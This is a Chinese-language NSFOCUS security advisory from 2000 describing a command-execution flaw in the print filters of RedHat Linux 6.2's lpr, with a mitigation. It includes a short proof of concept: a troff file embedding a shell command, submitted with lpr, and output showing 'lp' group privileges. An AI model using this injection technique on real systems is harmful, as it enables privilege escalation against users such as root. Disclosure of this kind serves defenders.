首页 -> 安全研究

安全研究

安全漏洞
RedHat lpr 执行任意命令漏洞

发布日期:2000-10-26
更新日期:2000-10-26

受影响系统:

BSD lpr 0.54-4
   + RedHat Linux 6.2
不受影响系统:

RedHat Linux 7.0
描述:

RedHat Linux 6.2所带的lpr软件包存在一个安全问题允许攻击者以'lp'组的权
限行任意命令。

这个问题并不是lpr程序本身的问题,而是打印过滤器的问题,攻击者可以将想
要执行的命令嵌入到一个troff文件中去,当lpr处理这个troff文件时,将会以
lp组的权限执行内嵌的命令。

如果lp组的权限被攻击者获得,他可以修改lpr的配置文件,当其他用户(比如
root)进行打印操作时,就可能以该用户身份执行任意命令,并获得该用户的权
限。

<*来源:zenith parsec (zenith_parsec@the-astronaut.com) *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


[zen@continuity /tmp]$ cat asdf
PS
sh D/usr/bin/id>/tmp/yougetanyideasyetD
.PF

[zen@continuity /tmp]$ lpr asdf

[zen@continuity /tmp]$ cat /tmp/yougetanyideasyet

uid=500(zen) gid=500(zen) groups=7(lp)

建议:

临时解决方法:

NSFOCUS建议您在没有得到补丁程序之前,暂时禁止lpr的使用(如果您安装并使
用lpr的话)

厂商补丁:

暂无

浏览次数:5923
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障